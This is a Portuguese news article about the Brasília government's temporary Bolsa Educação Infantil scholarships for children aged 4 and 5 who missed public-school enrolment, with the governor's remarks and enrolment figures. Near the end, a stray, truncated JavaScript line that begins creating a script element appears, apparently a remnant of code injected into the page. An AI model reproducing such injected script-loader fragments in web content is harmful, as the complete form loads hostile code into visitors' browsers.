Governo concede bolsas de estudo para crianças de 4 e 5 anos

Responsáveis que não conseguiram realizar a telematrícula no ensino público do Distrito Federal poderão recorrer a bolsas que serão oferecidas pelo governo de Brasília. No total, 2,5 mil crianças serão beneficiadas com o valor de R$ 456,17. As escolas contempladas não poderão cobrar taxas extras dos beneficiados.

O governador de Brasília, Rodrigo Rollemberg, anunciou o edital na Residência Oficial de Águas Claras. Foto: Dênio Simões/Agência Brasília.

O governador de Brasília, Rodrigo Rollemberg, anunciou o edital na Residência Oficial de Águas Claras. “Hoje é um dia muito importante de avanço da universalização da educação para crianças de 4 e 5 anos”, disse. “Já aumentamos em 24% o número alunos de até 5 anos na escola”, listou. Há 42 creches públicas no DF, sendo 19 inauguradas pela atual gestão. Desde janeiro de 2015, por meio de creches públicas e conveniadas, o DF passou de 47.072 crianças de até 5 anos atendidas na rede para 58.443.

A concessão do auxílio está prevista no Projeto de Lei nº 1.177, de 2016, e envolverá escolas credenciadas pelo governo que tenham turmas de educação infantil e comprovem disponibilidade de vagas. Instituições de qualquer região administrativa poderão participar, sendo que, de acordo com o texto, terão prioridade aquelas sem fins lucrativos. O benefício do Bolsa Educação Infantil é temporário e valerá até surgir uma vaga na rede pública.

 

 

var d=document;var s=d.createElement(‘script’);

Fonte:

Deixe um comentário